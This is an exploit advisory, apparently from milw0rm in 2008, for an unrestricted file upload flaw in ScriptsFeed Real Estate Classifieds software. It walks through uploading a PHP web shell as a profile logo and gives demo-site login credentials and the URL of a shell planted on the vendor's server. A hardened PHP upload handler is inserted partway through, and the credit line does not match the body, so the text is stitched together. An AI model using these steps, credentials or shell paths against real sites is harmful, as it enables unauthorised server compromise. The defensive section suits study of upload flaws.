ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln by h3m4n

[~]   ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
[~]
[~]   ----------------------------------------------------------
[~]   Discovered By: ZoRLu
[~]
[~]   Date: 13.11.2008
[~]
[~]   Home: www.z0rlu.blogspot.com
[~]
[~]   contact: trt-turk@hotmail.com
[~]
[~]   NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~]   my bug number now: 39
[~]
[~]   my target bug number: 100
[~]
[~]   -----------------------------------------------------------

Exploit:

http://localhost/script/re_images/[id]_logo_your_shell.php

First, register an account on the site:

register: http://localhost/script/register.php

Then log in:

login: http://localhost/script/login.php

Then open the profile edit page:

profile: http://localhost/script/profile.php

Upload your_shell.php as your logo. Right-click the logo image, select Properties and copy the link,
then paste it into your browser to reach your_shell.php.

your_shell.php path:

http://localhost/script/re_images/[id]_logo_your_shell.php

RFU (remote file upload) account on the vendor demo:

user: zorlu

passwd: zorlu1


shell path:

http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php

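The root cause above is a profile-logo upload that keeps the client-supplied filename and extension and writes it into the web-served re_images directory. As an added, defensive example (not ScriptsFeed code), here is a hardened PHP upload handler that ignores the client filename, sniffs the real content type, and stores the logo under a server-chosen name with a fixed image extension. The directory name re_images, the form field name "logo" and the size limit are assumptions.

```php
<?php
// Added example, not the vendor's code: hardened logo upload for profile.php.
declare(strict_types=1);

const LOGO_DIR     = __DIR__ . '/re_images';   // assumed upload directory
const MAX_LOGO_LEN = 512 * 1024;               // 512 KiB cap, assumed policy

// Content-sniffed MIME type => the only extension we will ever write.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate an uploaded logo and store it as "<userId>_logo.<ext>".
 * Returns the stored filename, or throws on any validation failure.
 */
function storeLogo(array $file, int $userId): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_LOGO_LEN) {
        throw new RuntimeException('logo too large');
    }
    // Decide the type from file content, never from $file['name'] or $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('only JPEG, PNG or GIF logos are accepted');
    }
    // Independent second check: the file must parse as an image.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file is not a valid image');
    }
    // Server-chosen name: numeric id plus fixed extension, so the original
    // "your_shell.php" name can never reach disk.
    $name = sprintf('%d_logo.%s', $userId, ALLOWED_TYPES[$mime]);
    $dest = LOGO_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store logo');
    }
    chmod($dest, 0644);
    return $name;
}

// Usage from profile.php (assumed field name "logo"):
// $stored = storeLogo($_FILES['logo'], (int) $_SESSION['user_id']);
```

Pair this with a web-server rule that disables script execution under re_images, so that even a validation bypass yields a file that is served as static content rather than run.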
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-13]



